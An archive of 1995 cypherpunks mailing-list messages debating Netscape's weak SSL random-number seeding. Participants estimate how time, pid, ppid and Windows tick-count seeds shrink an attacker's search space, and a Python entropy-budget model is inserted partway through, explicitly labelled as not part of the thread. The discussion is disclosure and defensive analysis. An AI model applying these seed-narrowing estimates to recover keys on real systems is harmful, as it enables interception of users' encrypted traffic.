> pid and ppid, then the attack will take longer. If the Navigator
> is running on an SGI machine with a high resolution cycle counter then
> it is used as the first of the two 32bit seeds.

The release mentioned "computation time". In my book that doesn't include the setup time involved in figuring out how to snag the packets, sending the sendmail spoofs in order to approximate the pid and ppid, etc.

> I believe that it would take much longer than 1 minute to mount an
> attack against a mac, pc, or unix machine that the attacker was not

"time to mount an attack" is not "computation time". I'm really not debating with -you- though here, just describing how the release was inaccurate. I don't deny any of your statements

> logged on to.
> I don't know exactly how the few hour number was
> calculated, since it was done by marketing with input from someone else
> in the group. Another interesting data point is that the unix version,
> which was most vulnerable, accounts for less than 10% of our user
> base, according to the yahoo random link stats.

Is UNIX really the most vulnerable? How many bits did the tickcount account for? Seems to me that guessing just time & tick would be easier than guessing time, pid and ppid if you are not logged into the machine in question. . .

>
> Of course none of this reduces the magnitude of the screw up/bug/design
> flaw/whatever. I really can't say which of these it was since I wasn't
> around at the time that this code was being written. I must admit that
> the RNG seed code was not an area that I thought to examine when I took
> over our security library.

I don't know what your background is, so don't take this as a personal attack please, but someone who is trained in computer security and cryptography implementation should *know* to check these things. Hell, even I would check those things, and I'm not a cryptographer by any means.

>
> This was a bad mistake on our part, and we are working hard to fix it.
> We have been trying to identify sources of random bits on PCs, Macs, and
> all of the many unix platforms we support. We are looking at stuff that
> is system dependent, user dependent, hardware dependent, random external
> sources such as the network and the user. If anyone has specific
> suggestions I would love to hear them so that we can do a better job.
>

Again, Kudos to Netscape for the quick response.

> > A group which offered to review the first version, but
> > Netscape refused.
>
> Do you mean that cypherpunks offered to review the netscape code
> if only we made all the source available on the net? I think that it
> is unrealistic to expect us to release all of our source code to the
> net.
I was referring to Jim Bidzos's comment, posted to cypherpunks. The release I will be sending out is written much more cleanly than what I initially posted to cypherpunks.

>
> We will be having at least some of our code reviewed by a
> wider audience, but I don't yet know which code, or how wide a review
> group. If anyone has specific suggestions for pieces of code that
> you would like to see widely reviewed (such as RNG and seed generation)
> let me know.

Great!

>
> I realize that some cypherpunks think that we should make all of
> our code publicly available. In an ideal world that would be great,
> but we live in a world with politicians, crooks, lawyers, stockholders,
> etc... Don't expect to see us posting our entire security
> library source code to cypherpunks.

Ah but who's to stop an anonymous posting. nudgenudge. ;) (This is a -joke-, for those excessively humor impaired)

> > From their release it looks like they aren't finding a better
> > source of entropy, but just using *more* sources of entropy. Doesn't
> > mean that the entropy is good.
>
> I would love to hear your suggestions for good sources of entropy
> on any systems that our products run on.

When I wrote that sentence I misread the release -- my apologies-- my initial reading gave me the impression that the only thing that was being done was increasing the key size to 300 with no additional work towards finding sources of randomness, which you have said you were working on.

--
sameer

From sameer at c2.org Wed Sep 20 01:23:47 1995
From: sameer at c2.org (sameer)
Date: Wed, 20 Sep 95 01:23:47 PDT
Subject: COMMUNITY CONNEXION CORRECTS INACCURACIES IN NETSCAPE PRESS RELEASE
Message-ID: <199509200818.BAA18511@infinity.c2.org>

Sept. 20, 1995
For Immediate Release
Contact: Sameer Parekh
510-601-9777

COMMUNITY CONNEXION CORRECTS INACCURACIES IN NETSCAPE PRESS RELEASE

In response to Ian Goldberg and David Wagner's recent cryptanalysis and defeat of Netscape Navigator's security, Netscape Communications Corporation has recently issued a press release describing the work Ian and David had done, announced a fix, and offered comments on what they felt were the implications on the security of their software.

Community ConneXion congratulated Netscape Communications Corporation today for their quick response to this security problem. The fact that they responded to the problem within two days of its publication reflects well upon their responsiveness to the internet community, said Sameer Parekh, Community ConneXion founder.

Sameer noted, however, that their release contained a number of inaccuracies. He wrote a document detailing the inaccuracies that he found, available via the World-Wide-Web at http://www.c2.org/hacknetscape/critique.phtml. He noted that they overestimated the time necessary to exploit the bug by roughly two orders of magnitude. The description of the bug was also flawed, said Sameer. Finally, he described how the solution Netscape was presenting to the problem was viewed by many members of the internet security community as only a partial fix.

"Millions of customers and their sensitive information are at stake. Had Ian and Dave been criminals rather than honest students, they might have taken this opportunity to steal credit card numbers, snoop on people's financial transactions, and possibly more."

"Are we going to take the chance that the next person who finds a Netscape bug may be someone who would rather steal lots of money than win some T-shirt?" asked Sameer, referring to the T-shirt promotion his company has developed, offering free T-shirts to people who have found holes in Netscape security software.

Community ConneXion is the premier internet privacy ISP.
They offer anonymous accounts, remailers, and pseudonym servers, in addition to the standard ISP fare of webspace and dialup IP access. Information is available from http://www.c2.org or mailing info at c2.org.

Netscape and Netscape Navigator are trademarks of Netscape Communications Corporation.

From sameer at c2.org Wed Sep 20 01:31:04 1995
From: sameer at c2.org (sameer)
Date: Wed, 20 Sep 95 01:31:04 PDT
Subject: netscape's response
In-Reply-To: <199509200812.BAA17876@infinity.c2.org>
Message-ID: <199509200825.BAA18996@infinity.c2.org>

> but someone who is trained in computer
> security and cryptography implementation should *know* to check these
> things.

Upon consideration, I am going to retract this statement -- I suppose you can't check -everything-. (I still blame Netscape for shoddy crypto in the first place, just not Jeff in particular)

--
sameer                                    Voice:  510-601-9777
Community ConneXion                       FAX:    510-601-9734
An Internet Privacy Provider              Dialin: 510-658-6376
http://www.c2.org (or login as "guest")   sameer at c2.org

From jsw at netscape.com Wed Sep 20 01:42:47 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 01:42:47 PDT
Subject: netscape's response
In-Reply-To: <199509200729.AAA24565@Csli.Stanford.EDU>
Message-ID: <9509200139.ZM206@tofuhut>

On Sep 20, 12:29am, Christian Wettergren wrote:
> Subject: Re: netscape's response
> One wild idea that I just got was to have servers and clients exchange
> random numbers (not seeds of course), in a kind of chaining way. Since
> most viewers connect to a number of servers, and all servers are
> connected to by many clients, they would mix "randomness sources" with
> each other, making it impossible to observe the local environment
> only. And the random values would of course be encrypted under the
> session key, making it impossible to "watch the wire".

Wow, this is a great idea!!
SSL already sends various encrypted random values back and forth between client and server, so this may not be too hard to implement without changing the protocol. I'll keep it in the back of my mind for when I have some time...

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From carolann at censored.org Wed Sep 20 01:55:20 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 01:55:20 PDT
Subject: C'Punks meet the T*'s, T*'s meet the C'Punks!
Message-ID: <199509200855.BAA25899@usr4.primenet.com>

-----BEGIN PGP SIGNED MESSAGE-----

Washington, DC is not a cyberpunk town.
TheXGrrrl (Jessica Xavier)

You are absolutely right. It's not a cyberpunk town. It's a cypherpunk town, and I ultimately deal in munitions.

PGP, the program that signed this message, is a munition. It's illegal to export the stuff. So good, the military uses it. I will teach everyone how to use it, and make what's called: A WEB OF TRUST!

Having a ninety person web of trust will get you farther than millions and millions of dollars. This is affectionately known as "a reputation market". I started a small transgendered reputation market last winter. It has yet to be broken.

A TRANSGENDER WEB OF TRUST can and will do more than HRCF ever dreamed of. And in no time at all! Once you make and start to sign other persons' keys, THEN YOU CAN RELY on what is coming to your computer, and THEY CAN RELY on what is coming from you.

This is what the Human Rights Campaign Fund has relied on: They have relied on us being in a web of omission! They have relied on us worrying about being in error! The result is that we are out of The Employment Nondiscrimination Act.

THE CYPHERPUNK WEB OF TRUST is absolutely kewl! We went from cracking a key, to cracking a bigger key, to CRACKING NETSCAPE inside of one month.
How we deal with ENDA will be NO DIFFERENT, once a WEB OF TRUST IS IN PLACE! Each signed PGP message extends the WEB OF TRUST. Each new key means that SEXUAL IDENTITY is as important as SEXUAL ORIENTATION. It effectively stops the so-and-so told so-and-so told so-and-so stuff dead cold.

And as a result I can now issue two HEADLINES:

CAROL ANNE BEGINS TO EXPAND "TRANSGENDER WEB OF TRUST".
CYPHERPUNKS WATCH CAROL ANNE FLEX PGP'S MUSCLE FOR TRANSGENDERS.

For when we are in DC, I will help you all make and sign keys. And when we're done, somebody will go to Phil Z. to sign his/her key. You can then re-sign each key, and send it to the keyservers in total confidence. Then you too become a munitions dealer.

You will be amazed at who your new friends will become. What they will give you. THIS VERY COMPUTER THAT I TYPE ON IS A LIVING PROOF THAT THIS WORKS. Go do a whois on bugtown.com; this will show you where my new box came from. I started the CYPHERPUNK list with an 8088 at 2400 baud. I'm now at 486/66 at 14.4. And soon they'll have a secure server for me to use.

We have Joe & Jill Sixpack on the cypherpunk list. Joe and Jill are typical end users of computers. I am the embodiment of Jill Sixpack. The Cypherpunks know I can't write a word of code. But I can, and do, market the stuff really well.

Cypherpunks, meet the Transgenders. Transgenders, meet the Cypherpunks.

What you are about to witness is the implementation of legislation in Washington, using PGP as the information dissemination vehicle. Something unknown to exist at present.

No Miss XGRRL, we don't need too much money. We now need only use the weapons at our disposal. They have been bought and paid for by the blood and sweat of the Cypherpunk Community. They are as good as having a nuclear missile pointed at THE HUMAN RIGHTS CAMPAIGN FUND. They are ours for the taking, using and learning. Just as being transgendered is a learning process, being a cypherpunk is also a learning process.
Washington will be cracked! And having Pretty Good Privacy (tm) will be a whole lot better than lots of money and tons of gossip. Transgenders need facts, because our bodies are at stake. Cypherpunks need facts, because privacy is at stake. Many privacy rights are at stake in ENDA!

I must end my rant now. Thanks for reading it.

Love Always,
Carol Anne
Cypherpunk
9/20/95 3:50 AM CDT

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)   carolann at censored.org   206.42.112.96
My Homepage   The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
http://dcs.ex.ac.uk/~aba/export/

From unicorn at polaris.mindport.net Wed Sep 20 02:46:01 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Wed, 20 Sep 95 02:46:01 PDT
Subject: response to netscape's press release
In-Reply-To: <199509200336.UAA28871@infinity.c2.org>
Message-ID:

On Tue, 19 Sep 1995, sameer wrote:

> Netscape secure software has been in use for almost a year on the
> Internet by millions of customers and no thefts of actual customer
> information protected by our security have been reported - this
> posting on the Internet reported a potential vulnerability, not the
> actual theft of customer information.
>
> Yes, Netscape is very lucky that Ian and David are students, and not
> criminals.
> I sincerely hope that the next time someone finds a hole in
> Netscape that it's someone who would rather win a free T-shirt than
> steal lots of money.

I hope exactly the reverse. It seems the only way the truth will get out and heads at Netscape or anywhere else will roll like they should. Consequences dictate incentives. No consequence, no incentive to avoid.

> --
> sameer                                    Voice:  510-601-9777
> Community ConneXion                       FAX:    510-601-9734
> An Internet Privacy Provider              Dialin: 510-658-6376
> http://www.c2.org (or login as "guest")   sameer at c2.org
>

---
"In fact, had Bancroft not existed,          potestas scientiae in usu est
Franklin might have had to invent him."      in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From jsw at netscape.com Wed Sep 20 02:52:20 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 02:52:20 PDT
Subject: netscape's response
In-Reply-To: <199509200812.BAA17876@infinity.c2.org>
Message-ID: <9509200248.ZM206@tofuhut>

On Sep 20, 1:12am, sameer wrote:
> > I believe that it would take much longer than 1 minute to mount an
> > attack against a mac, pc, or unix machine that the attacker was not
>
> "time to mount an attack" is not "computation time".
>
> I'm really not debating with -you- though here, just
> describing how the release was inaccurate. I don't deny any of your
> statements.

The issue is that any statement that only mentions the 1 minute figure is only stating part of the story, just as a statement giving a figure of several hours is only mentioning a part of the story. All of the news articles I've seen (not an exhaustive sample) have only mentioned the 1 minute number, which only really affects a relatively small number of our customers. If you don't know the pid and ppid, or the tick count in the case of Mac/PC, you will have to add them to your search, which could make it take much longer than 1 minute to crack.
If you assume that the unix machine has been up for a while and has a decent turnover of processes (not a valid assumption for determining strength) then you would have to search on average half of 16-bit pid space, and then add a few bits for the ppid (assuming that it is likely to be close to the pid). Even if you only got 8 extra bits from pid and ppid, that turns your one minute attack into a several hour attack. Anyway, I'm not trying to say that "several hours" is the only answer, just that it is just as good an answer as "one minute". As far as I know, no one has tried this attack without knowing the pids.

> > logged on to. I don't know exactly how the few hour number was
> > calculated, since it was done by marketing with input from someone else
> > in the group. Another interesting data point is that the unix version,
> > which was most vulnerable, accounts for less than 10% of our user
> > base, according to the yahoo random link stats.
>
> Is UNIX really the most vulnerable? How many bits did the
> tickcount account for? Seems to me that guessing just time & tick
> would be easier than guessing time, pid and ppid if you are not logged
> into the machine in question. . .

This is really dependent on how long Windows has been running. If you boot windows and immediately start an ssl connection, then the number will be pretty low, but if you don't make the first SSL connection until later, it should get better. I think an hour would get you around 16 bits, but this is just a guesstimate on my part. If you leave your machine running windows for days you will get close to 32 bits.

> > Do you mean that cypherpunks offered to review the netscape code
> > if only we made all the source available on the net? I think that it
> > is unrealistic to expect us to release all of our source code to the
> > net.
>
> I was referring to Jim Bidzos's comment, posted to
> cypherpunks.
> The release I will be sending out is written much more cleanly
> than what I initially posted to cypherpunks.

We had a conference call with RSA folks Tuesday, and they will be in Wednesday to take a look at our fix.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From unicorn at polaris.mindport.net Wed Sep 20 02:57:25 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Wed, 20 Sep 95 02:57:25 PDT
Subject: Investing on Information We Get Here
In-Reply-To:
Message-ID:

On Wed, 20 Sep 1995, Michael Shields wrote:

> > (These computer lists are really great for investors! I heard about the
> > Apple problems a few days before they hit the street, and was able to
> > unload a bunch of shares at $45, a day before it dropped, now down to
> > around $36. "He who hesitates to act on inside information is lost.")
>
> This isn't inside information in the illegal-to-trade-on-in-the-US sense,
> is it? cypherpunks, while maybe not mainstream, is publicly available.

You'd have to argue that reverse engineering was misappropriation within the meaning of the rules, and that the data was tipped to the tippees with the intent of gain. In other words, you must have a fraud with respect to the rightful owner of the "misappropriated" information. That an important commerce system is insecure, be it publicly held or whatever, when publicly posted, is hardly misappropriation, or if it is alleged so, I'll defend the accused (if they are in my jurisdictions of license).

I might add that trading on information that has been released but just not propagated to the entire market yet is hardly illegal.

If anyone wants a detailed analysis with cases on the subject, I will post to the list with enough interest.

> --
> Shields.
>

---
"In fact, had Bancroft not existed,          potestas scientiae in usu est
Franklin might have had to invent him."
in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From jsw at netscape.com Wed Sep 20 02:58:26 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 02:58:26 PDT
Subject: netscape's response
In-Reply-To: <199509200825.BAA18996@infinity.c2.org>
Message-ID: <9509200254.ZM206@tofuhut>

On Sep 20, 1:25am, sameer wrote:
> Subject: Re: netscape's response
> > but someone who is trained in computer
> > security and cryptography implementation should *know* to check these
> > things.
>
> Upon consideration, I am going to retract this statement-- I
> suppose you can't check -everything-. (I still blame Netscape for
> shoddy crypto in the first place, just not Jeff in particular)

It turns out that Taher Elgamal and I started working here within a week of each other, about 6 months ago. Neither of us thought to take a serious look at the RNG seed code. I don't think that anyone would accuse Taher of being an amateur in this area. I for one just didn't think about it enough to realize that while we got the RNG code from RSA, they did not provide seed code.

As for my background, I am not a trained cryptographer, but I do understand protocols, did some internet security work as a sysadmin while in school, and have had a casual interest in crypto stuff for several years. If you want the gory details see my web page...

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From unicorn at polaris.mindport.net Wed Sep 20 03:05:21 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Wed, 20 Sep 95 03:05:21 PDT
Subject: C'Punks meet the T*'s, T*'s meet the C'Punks!
In-Reply-To: <199509200855.BAA25899@usr4.primenet.com>
Message-ID:

On Wed, 20 Sep 1995, Censored Girls Anonymous wrote:

> A TRANSGENDER WEB OF TRUST, can and will do more than HRCF ever
> dreamed of.
> And in no time at all! Once you make and start to
> sign other persons keys, THEN YOU CAN RELY on what is coming to
> your computer, and THEY CAN RELY on what is coming from you.

Two words. "Settlement Agreement."

---
"In fact, had Bancroft not existed,          potestas scientiae in usu est
Franklin might have had to invent him."      in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From jsw at netscape.com Wed Sep 20 03:06:04 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 03:06:04 PDT
Subject: Please send me SSL problems...
Message-ID: <199509201004.DAA23933@ammodump.mcom.com>

I'd just like to let all cypherpunks know that I'm really interested in getting any feedback you might have about security problems with Netscape products. I'm particularly interested in bugs in our implementation of SSL, and problems in the protocol that are not addressed in SSL 3.0.

We have been collecting comments on SSL 3.0, and have started incorporating that feedback into our spec. Please don't assume that our lack of response means that we are ignoring your comments. Between Navigator 2.0 and things like the SSL challenge and the RNG fire drill, we just have not had the time to get a new rev of the spec out. Hopefully soon...

I should also warn folks that Navigator 2.0 will not include SSL 3.0. We just don't have time to do it. It will become a high priority for us after 2.0 goes out, or maybe sooner depending on hiring.

--Jeff

Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From Holger.Reif at PrakInf.TU-Ilmenau.DE Wed Sep 20 03:35:43 1995
From: Holger.Reif at PrakInf.TU-Ilmenau.DE (Holger Reif )
Date: Wed, 20 Sep 95 03:35:43 PDT
Subject: NYT on Netscape Crack
Message-ID: <9509201034.AA10521@PrakInf.TU-Ilmenau.DE>

Is it a good idea to use different (unrelated!)
seeded PRNGs for the challenge data (which can be seen by sniffing) and the masterkey (which should never leave the client's memory)?

read you later
- Holger Reif
http://remus.prakinf.tu-ilmenau.de/Reif/

From jsw at neon.netscape.com Wed Sep 20 03:38:58 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 03:38:58 PDT
Subject: My Day
In-Reply-To: <43o44t$hof@calum.csclub.uwaterloo.ca>
Message-ID: <43oquc$70f@tera.mcom.com>

In article <43o44t$hof at calum.csclub.uwaterloo.ca>, iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg) writes:

[ summary of Ian's day deleted ]

Now imagine what my last 48 hours have been like. :-)

> Holger.Reif at PrakInf.TU-Ilmenau.DE (Holger Reif ) was kind enough to
> verify that the SunOS 4.1.3 version of Netscape generates its keys in
> _exactly_ the same way as Solaris and HP-UX; he says he'll test other
> architectures tomorrow. I suspect any big-endian machine with the
> lrand48() function (which is used in key generation on Solaris/HP-UX;
> it's disguised in unssl.c as the macro mklcpr()) will be the same.
> Other Unix flavours should require only minor changes.

Most of the unix machines do the same thing. On SGI machines that have the hardware cycle counter, its value is used in place of the srand48(usec), lrand48() sequence. On BSDI the code used srandom and random.

> I'm still interested in what Windoze clients do (other than lose).

On windows and mac the first 32-bit seed is seconds since 1970, and the second 32-bit seed is the "tick count", which I'm told is the number of milliseconds since windows started.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
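The following is an added illustration, not code from this thread or from Netscape: it turns the seed components Jeff describes (time of day, pid and ppid on Unix; seconds since 1970 plus a tick count on Windows and Mac) into an entropy budget, i.e. how many bits an observer must still search once they can pin down the rest, and how Jeff's one-minute figure scales with extra bits. The candidate counts are the thread's own assumptions (half of 16-bit pid space plus a few bits of ppid, a day of 1/60 s Mac ticks, a tick count narrowed to under 2**10), while the scenario and function names are mine.

```python
import math
import secrets

# Constructed model of the seed components discussed in this thread for the
# 1995 Navigator. Added illustration, not Netscape's code. Each count is the
# number of values an observer must still try for that component after using
# whatever they can learn about the target machine. Scenario names are mine.
SCENARIOS = {
    # Jeff's conservative "only 8 extra bits" from pid and ppid.
    "unix_pid_ppid_8_bits": {"pid_and_ppid": 2 ** 8},
    # Half of the 16-bit pid space, plus a few bits for a ppid near the pid.
    "unix_pid_half_space": {"pid": 2 ** 15, "ppid": 2 ** 3},
    # Mac: 1/60 s ticks over at most a day of uptime (3600 * 24 * 60).
    "mac_tick_one_day": {"tick": 3600 * 24 * 60},
    # Windows: ms tick count narrowed to under 2**10 by watching reboots.
    "windows_tick_narrowed": {"tick": 2 ** 10},
    # Windows: nothing known about uptime, the full 32-bit counter.
    "windows_tick_unknown": {"tick": 2 ** 32},
}


def search_space_bits(counts):
    """log2 of the combined candidate count of the given seed components."""
    total = 1
    for name, n in counts.items():
        if n < 1:
            raise ValueError(f"{name}: candidate count must be >= 1")
        total *= n
    return math.log2(total)


def time_seed_bits(clock_uncertainty_s, resolution_s=1e-6):
    """Bits left in a timestamp-derived seed when the observer knows the
    target's clock to within +/- clock_uncertainty_s (NTP: a few ms) and the
    seed is taken at resolution_s. The field may be 32 bits wide, but only
    the low-order bits the observer cannot predict count as entropy."""
    candidates = max(1, round(2 * clock_uncertainty_s / resolution_s))
    return math.log2(candidates)


def scaled_search_minutes(baseline_minutes, extra_bits):
    """Scale a measured search time by the extra bits that must be covered
    (Jeff's one-minute figure assumed the pid and ppid were known)."""
    return baseline_minutes * 2 ** extra_bits


def scenario_bits():
    """Bits to search in every modelled scenario, rounded to one decimal."""
    return {name: round(search_space_bits(c), 1) for name, c in SCENARIOS.items()}


def os_csprng_key(nbytes=16):
    """The remedy the thread's hunt for entropy sources led to in practice:
    draw key material from the OS CSPRNG, which pools hardware and kernel
    event entropy, instead of seeding a PRNG from clock and pid values."""
    return secrets.token_bytes(nbytes)


if __name__ == "__main__":
    for name, bits in scenario_bits().items():
        print(f"{name:24s} {bits:5.1f} bits")
    print(f"usec clock vs NTP-synced observer: {time_seed_bits(0.002):.1f} bits")
    hours = scaled_search_minutes(1, 8) / 60
    print(f"one-minute search with 8 extra bits: {hours:.1f} hours")
```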
From jsw at neon.netscape.com Wed Sep 20 03:50:32 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 03:50:32 PDT
Subject: SSL implementation problem at Netscape
In-Reply-To: <43kki8$os7@charm.magnus.acs.ohio-state.edu>
Message-ID: <43ork2$70f@tera.mcom.com>

In article <43o47v$fsd at cnn.Princeton.EDU>, dawagner at flagstaff.princeton.edu (David A. Wagner) writes:
> In article from sci.crypt,
> David Sternlight wrote:
> > If the above is, in fact, accurate it appears to apply to previous
> > versions of Netscape, not the 2.0 versions for which the public beta goes
> > out next week.
>
> We haven't tried it on v2.0, as we only have a copy of v1.1 right now.
> But the front-page New York Times article today said that the next version
> also has the same flaw, and that it'll be fixed before release.

First off, Sternlight is not an agent working for netscape. :-)

The same fix that will be going out to patch old versions will be applied to 2.0 before we do a public beta. As with any code it will be refined as necessary before the final release of 2.0.

[ stuff deleted ]

> While we don't yet know exactly how long it would take to break Netscape's
> PRNG in this threat model, I think it's clear that Netscape's current
> implementation is insufficient and insecure.

Agreed. See other messages of mine for a more detailed response.

> We don't know about e.g. PC's yet -- this is another area we were still
> working on. I will note that Netscape didn't try to claim that any version
> was safe from this flaw, for what that's worth...

Again, see my other messages on this and related topics for more details of what the code was doing on PC and Mac.

> Hopefully this will be quickly fixed by Netscape, and then we can all stop
> worrying about it! :-)

Yup. Then I can get back to working only 16 hours a day.
:-)

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From fair at clock.org Wed Sep 20 04:36:04 1995
From: fair at clock.org (Erik E. Fair (Time Keeper))
Date: Wed, 20 Sep 95 04:36:04 PDT
Subject: Please send me SSL problems...
Message-ID:

> I'd just like to let all cypherpunks know that I'm really interested in
> getting any feedback you might have about security problems with Netscape
> products. I'm particularly interested in bugs in our implementation
> of SSL, and problems in the protocol that are not addressed in SSL 3.0.
>
> We have been collecting comments on SSL 3.0, and have started incorporating
> that feedback into our spec. Please don't assume that our lack of response
> means that we are ignoring your comments. Between Navigator 2.0 and
> things like the SSL challenge and the RNG fire drill, we just have not had
> the time to get a new rev of the spec out. Hopefully soon...

Jeff, the SSL specification has a severe *architectural* problem - it assumes that Internet Protocols are APIs - interface standards, and that you can just slide a "layer" underneath without anyone noticing.

Such is not the case - all the Internet Protocols are real protocol standards, in that they specify the syntax, order, and semantics of the actual bits on the wire. The IETF quite explicitly doesn't care about APIs - that's a host software issue, and it doesn't matter what the host software looks like (or even what the machine looks like), so long as it gets the bits on the wire right, according to the protocol spec. This is how the Internet can make very strong guarantees about interoperability.

You can't fiddle with a communication protocol without getting agreement from everyone about the change, or extend it in a way that is compatible with the protocol you're modifying, on a per-protocol basis (e.g.
adding a TELNET negotiation option to TELNET for encryption, an FTP command to FTP, etc). Otherwise, all you've done is made a private, non-interoperable change to an existing protocol that guarantees interoperability *failures* between systems that implement the existing specification, versus your own version of HTTP, or TELNET, or whatever.

In short, the SSL specification, as written, proposes to change all Internet application protocols, globally - "slide in a layer." That's not how it's done, and it's not the right place to do it, even if it appears to work in an enclave of systems.

About the SSL protocol, encryption algorithms, or the SQA that went into 'em, I think other people have expounded on those issues eloquently, and so I have nothing to add to that.

Erik Fair

From pfarrell at netcom.com Wed Sep 20 05:11:07 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Wed, 20 Sep 95 05:11:07 PDT
Subject: netscape's response
Message-ID: <29391.pfarrell@netcom.com>

"Jeff Weinstein" writes:
> The issue is that any statement that only mentions the 1 minute figure
> is only stating part of the story, just as a statement giving a figure
> of several hours is only mentioning a part of the story. All of the
> news articles I've seen (not an exhaustive sample) have only mentioned
> the 1 minute number, which only really affects a relatively small
> number of our customers.

The Washington Post ran an article today in the Business section. Its byline said Elizabeth Corcoran. It referred to the four hour attack figure. It appeared to be mostly a rewrite of the Netscape press release -- nearly no quotes, no quoted local sources (TIS, Denning, etc.)

I expect that many papers that are far from Silicon Valley will print it with a similar spin.

Pat

Pat Farrell    Grad Student    http://www.isse.gmu.edu/students/pfarrell
Info.
Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage
#include

From perry at piermont.com Wed Sep 20 05:12:05 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 20 Sep 95 05:12:05 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <155.9509191654@exe.dcs.exeter.ac.uk>
Message-ID: <199509201211.IAA04771@frankenstein.piermont.com>

aba at atlas.ex.ac.uk writes:
> Andrew Loewenstern writes:
> > Oh, can we now expect to see source to at least the security portions of
> > Navigator and the Commerce server?
> An excellent proposal.

Not especially useful. The bulk of the security problems won't obviously have anything to do with the "security" portion of the code.

> Save Ian and David the effort of reverse engineering it again (which
> it is obviously pointless, and more: mathematically impossible, to do),

What do you mean, mathematically impossible? That's silly.

> Or if that doesn't sit well with copyright interests, how about
> writing up an open spec about how the random number generator works?
> Then we can critique it.

That makes good sense, but I doubt they are that sensible. I also worry that they would try to do something like patenting obvious and long used techniques to "protect" themselves.

Perry

From sommerfeld at orchard.medford.ma.us Wed Sep 20 05:25:33 1995
From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld)
Date: Wed, 20 Sep 95 05:25:33 PDT
Subject: My Day
In-Reply-To: <43oquc$70f@tera.mcom.com>
Message-ID: <199509201218.MAA00433@orchard.medford.ma.us>

A couple of comments on using the time as a seed:

Any system running NTP will let you know its clock to within a couple of ms; some folks have gotten NTP accuracy down to the high hundred microseconds on real-time systems. Any entropy you get from sampling the system clock will have to come from the low-order bits of the tv_usec, or equivalent, and you'll only get a few bits per sample.
Getting real entropy from mouse movements under X may be tricky, because the X server goes out of its way to compress mouse movement reporting and to buffer events sent to the client ("X is an exercise in avoiding system calls"). You'll probably get less entropy than you might think.

> the second 32-bit seed is the "tick count", which I'm told is the number of
> milliseconds since windows started.

A 32-bit ms-resolution counter wraps roughly every 50 days. Very few Windoze PC's stay up that long :-).

In a long-term active attack, the tick count can be estimated by periodically pinging the system under attack, noticing when it goes off the air and then back on again, and using that as a base value for the tick count search, so the tick count probably only adds a factor of somewhat less than 2**10 to the keyspace, not 2**32.

- Bill

From m5 at dev.tivoli.com Wed Sep 20 05:49:32 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Wed, 20 Sep 95 05:49:32 PDT
Subject: My Day
In-Reply-To: <43oquc$70f@tera.mcom.com>
Message-ID: <9509201248.AA09892@alpha>

Bill Sommerfeld writes:
> > the second 32-bit seed is the "tick count", which I'm told is the number of
> > milliseconds since windows started.
>
> A 32-bit ms-resolution counter wraps roughly every 50 days. Very few
> Windoze PC's stay up that long :-).

Also (and note that it's been a while since I've messed around with PC's, but since the "architecture" remains chained to an early-80's design I suspect they're still the same) the PC clock frequency is generally pretty low. PC UNIX implementations usually run it at about 100 Hz, I think. There aren't a lot of available timers on the PC. One of them used to be used as the DRAM refresh timer; I don't know whether they still do that.

On the other hand, getting at a Windows PC over the network is a whole 'nuther enchilada, though if I want to keep my day job I need to get that figured out real soon now.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX      |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From paul at poboy.b17c.ingr.com Wed Sep 20 05:50:38 1995
From: paul at poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 20 Sep 95 05:50:38 PDT
Subject: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509201245.AA11962@poboy.b17c.ingr.com>

-----BEGIN PGP SIGNED MESSAGE-----

Jeff--

